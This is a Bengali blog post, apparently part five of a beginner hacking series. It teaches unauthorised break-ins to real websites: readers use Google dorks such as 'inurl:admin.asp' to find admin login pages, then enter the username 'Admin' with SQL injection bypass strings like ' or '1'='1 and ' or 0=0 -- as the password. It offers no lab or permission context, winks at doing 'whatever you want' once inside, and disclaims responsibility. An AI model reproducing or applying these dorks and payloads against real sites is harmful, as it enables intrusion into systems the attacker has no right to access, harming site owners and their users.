আমরা সবাই হ্যাকিং জিনিষ টার উপর একটু বেশি ইন্টারেস্ট?আর আমি আপনাদের চেষ্টা করব ১০ পর্বের মাধ্যমে কিছু টা হলে হ্যাকিং শিখানোর! আর আমি কোন বড় মাপের হ্যাকার নই কিংবা হ্যাকিং সম্পর্কে বেশি কিছু জানিও না!যা জানি তা আপনাদের কে বুঝনোর চেষ্টা করব (আমার মত করে)আর এটা শুদু মাত্র নতুন যারা হ্যাকিং জগত শুরু করতে চায় তাদের জন্য ! তাই অভিজ্ঞ ভাইয়েরা ভুল ধরিয়ে দিবেন?
আমরা ১ম ও ২য়, পর্বে আলোচনা করেছিলাম যে হ্যাকিং কি, হ্যাকার কারা,হ্যাকার কয় ধরনের? এবং হ্যাকার হতে আমাদের কী কী লাগবে!
এবং ৩য় পর্বে আমরা জেনেছিলাম হ্যাকার দের জন্য কয়েকটা ফোরাম, হ্যাকিং রিসোর্স! এবং কয়েকটা মুভি দিয়েছিলাম আশা করি অনেক এ দেখেছেন? আর দেখে অনেক কিছু শিখছেন? এবং ৪র্থ পর্বে আমরা আলোচনা করেছিলাম আইপি সম্পর্কে? আশা করি সবাই বুঝতে পেরেছেন?
আমরা আগের পর্ব গুলাতে এইটা ক্লিয়ার হয়েছি যে হ্যাকিং কি? হ্যাকার কারা? হ্যকার হতে কি কি লাগবে? একজন হ্যকার কি করলে সফল হয়! আর কি করলে পুলিশ এর হাতে দরা পরে?
তারমানে আমাদের প্রাথমিক ভাবে ক্লিয়ার হয়েছে হ্যাকিং জিনিষ টা কী? 
hack!!
তাই এখন আমরা মানে আজকের পর্বে আমরা একটা সাইট হ্যাক করব!!! তা হলে আসুন আমরা আমাদের প্রথম সাইট হ্যাক করি!!!!
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব।
- প্রথমে আমরা যাব http://www.google.com এ google.com
এবার Search বক্সে যে কোন একটি Google dork লিখুন। এখন Google dork পাবেন কোথায়?? ভয় পাবেন না! আমি আছি না? আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
এবার এই গুলার মধ্যে আপনার যেটা ইচ্ছা সেটা লিখে গুগল এ সার্চ দেন।আমি সার্চ দিলাম "inurl:admin.asp"
তারপর যে কোন সাইট এ ডুকেন 
! ডুকার পর এই রকম লিখা দেখবেন (সব সাইট কাজ করবে না, তাই হাল ছারবেন না চেষ্টা চালিয়ে যাবেন এবং সাইট পেয়ে যাবেন)
! ডুকার পর এই রকম লিখা দেখবেন (সব সাইট কাজ করবে না, তাই হাল ছারবেন না চেষ্টা চালিয়ে যাবেন এবং সাইট পেয়ে যাবেন)welcome to xxxxxxxxxx administrator panel
username :
password :
এই রকম দেখবেন
এখন ইউজার নেইম আর পাসওয়ার্ড কি দিবেন? ইউজার নেইম দিবেন “Admin” আর পাসওয়ার্ড কি দিবেন ? নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 # এখন সাবমিট করুন ! ব্যাস কাজ শেষ এখন সাইট এর এডমিন প্যনেল এ ডুকে গেলেনএডমিন প্যনেল
এখন আপনার যা ইচ্ছা তাই করেন (ক্ষতি করবেন না) ! :evil: :-o
লুল
আবার বলছি (মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে)
আর এটা কোন প্রফেশনলা হ্যাকিং নয় ! এটা একদম সহজ ! তাই এই পদ্ধতিতে বেশি কিছু আশা করবেন না ! আগামি পর্বে RFI নিয়ে আলচোনা করব।
কিছু পরামর্শঃ
পর্যায় ক্রমে সবগুলো টিউটোরিয়াল খুব ভালোভাবে অধ্যায়ন করতে হবে। নিজে নিজে এগুলো অনুশিলনের চেষ্টা করতে হবে। কথনই নিজে অরক্ষিত থেকে হ্যাকিং চেষ্টা চালাবেন না। মনে রাখবেন কিছু কিছু টিউটোরিয়াল হবে অনৈতিক তাই সেগুলোর যেকোন দায়ভার আমি বহন করব না।
আপনার লক্ষ যদি হয় ১০ কিলোমিটার আপুনি লক্ষ টিক করুন ১০ মিটার আর এই ১০ মিটার আস্তে আস্তে করেন দেখবেন কখন ১০০মিটার হয়ে গেছে বুঝতে পারবেন না !টিক তেমন আপুনি যদি প্রথম যদি মনে করেন আপনি হ্যাক করে ফেলবেন ফেসবুক!!! তা হলে আপুনি ঘোড়ার ডিম হ্যাক করবেন!!
আপনাকে আস্তে আস্তে শুরু করতে হবে এবং প্রাথমিক ভাবে !!
দেখবেন আপনি একদিন বড় হবেন (নিশ্চিত)
বেশি কিছু বলে ফেললে ক্ষমা করবেন।
আপনাকে আস্তে আস্তে শুরু করতে হবে এবং প্রাথমিক ভাবে !!
দেখবেন আপনি একদিন বড় হবেন (নিশ্চিত)
বেশি কিছু বলে ফেললে ক্ষমা করবেন।
No comments:
Post a Comment